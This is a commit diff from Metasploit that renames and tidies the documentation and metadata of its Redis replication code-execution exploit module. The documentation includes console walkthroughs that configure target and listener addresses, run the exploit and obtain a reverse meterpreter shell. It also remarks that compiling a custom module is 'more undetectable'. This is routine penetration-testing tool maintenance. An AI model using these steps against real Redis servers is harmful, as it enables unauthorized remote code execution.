Satify the msftidy_docs.

rapid7 · Mar 28, 2020 · 92fb321 · 92fb321
1 parent 4b17620
commit 92fb321
Show file tree

Hide file tree

Showing 2 changed files with 27 additions and 19 deletions.
diff --git a/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md b/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md
@@ -2,7 +2,9 @@
 
 ### Description
 
-This module exploits an unauthenticated code execution vulnerability in Redis 4.x and 5.x
+This module exploits a replication code execution vulnerability in Redis 4.x and later.
+
+### Installation Setup.
 
 **Vulnerable Application Link**
 
@@ -23,20 +25,22 @@ docker run -p 6379:6379 -d --name redis_slave redis
 
 ### CUSTOM
 
-IF `CUSTOM` set to true, this exploit would generate a source code file, and compile it to a redis module file during running, which is more undetectable.
+IF `CUSTOM` set to true, this exploit would generate a source code file, and
+compile it to a redis module file during running, which is more undetectable.
 It's only worked on linux system.
 
-For other scenarios, such as lack of gcc, or others opreate systems, framework could not compile the source for sucessful exploit, it uses the
+For other scenarios, such as lack of gcc, or others opreate systems, framework
+could not compile the source for sucessful exploit, it uses the
 pre-compiled redis module to accomplish this exploit.
 
 ## Scenarios
 
 ### set CUSTOM true (available only on linux)
 
 ```
-msf5 exploit(multi/redis/redis_unanth_rce) > options
+msf5 exploit(multi/redis/redis_replication_cmd_exec) > options
 
-Module options (exploit/multi/redis/redis_unanth_rce):
+Module options (exploit/linux/redis/redis_replication_cmd_exec):
 
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
@@ -63,9 +67,9 @@ Exploit target:
    0   Automatic
 
 
-msf5 exploit(multi/redis/redis_unanth_rce) > set verbose false
+msf5 exploit(multi/redis/redis_replication_cmd_exec) > set verbose false
 verbose => false
-msf5 exploit(multi/redis/redis_unanth_rce) > exploit
+msf5 exploit(multi/redis/redis_replication_cmd_exec) > exploit
 
 [*] Started reverse TCP handler on 172.17.0.1:8080 
 [*] 127.0.0.1:6379        - Compile redis module extension file
@@ -86,10 +90,10 @@ meterpreter >
 ### Set CUSTOM false (available on all system)
 
 ```
-msf5 > use exploit/linux/redis/redis_unauth_exec
-msf5 exploit(linux/redis/redis_unauth_exec) > options
+msf5 > use exploit/linux/redis/redis_replication_cmd_exec
+msf5 exploit(linux/redis/redis_replication_cmd_exec) > options
 
-Module options (exploit/linux/redis/redis_unauth_exec):
+Module options (exploit/linux/redis/redis_replication_cmd_exec):
 
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
@@ -116,19 +120,19 @@ Exploit target:
    0   Automatic
 
 
-msf5 exploit(linux/redis/redis_unauth_exec) > set rhosts 172.16.6.226
+msf5 exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 172.16.6.226
 rhosts => 172.16.6.226
-msf5 exploit(linux/redis/redis_unauth_exec) > set srvhost 172.16.6.1
+msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 172.16.6.1
 srvhost => 172.16.6.1
-msf5 exploit(linux/redis/redis_unauth_exec) > set srvport 6666
+msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvport 6666
 srvport => 6666
-msf5 exploit(linux/redis/redis_unauth_exec) > set lhost 172.16.6.1
+msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lhost 172.16.6.1
 lhost => 172.16.6.1
-msf5 exploit(linux/redis/redis_unauth_exec) > set lport 9999
+msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lport 9999
 lport => 9999
-msf5 exploit(linux/redis/redis_unauth_exec) > options
+msf5 exploit(linux/redis/redis_replication_cmd_exec) > options
 
-Module options (exploit/linux/redis/redis_unauth_exec):
+Module options (exploit/linux/redis/redis_replication_cmd_exec):
 
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
@@ -155,7 +159,7 @@ Exploit target:
    0   Automatic
 
 
-msf5 exploit(linux/redis/redis_unauth_exec) > exploit
+msf5 exploit(linux/redis/redis_replication_cmd_exec) > exploit
 
 [*] Started reverse TCP handler on 172.16.6.1:9999
 [*] 172.16.6.226:6379     - Listening on 172.16.6.1:6666
@@ -171,3 +175,4 @@ Server username: uid=999, gid=999, euid=999, egid=999
 meterpreter > getpid
 Current pid: 173
 ```
+
diff --git a/modules/exploits/linux/redis/redis_replication_cmd_exec.rb b/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
@@ -10,12 +10,15 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
   include Msf::Exploit::FileDropper
   include Msf::Auxiliary::Redis
+  include Msf::Module::Deprecated
+
+  moved_from "exploit/linux/redis/redis_unauth_exec"
 
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Redis Replication Code Execution',
       'Description'    => %q{
-        This module can be used to leverage the extension functionality added by Redis 4.x and 5.x
+        This module can be used to leverage the extension functionality added since Redis 4.0.0
         to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis
         which called replication between master and slave.
       },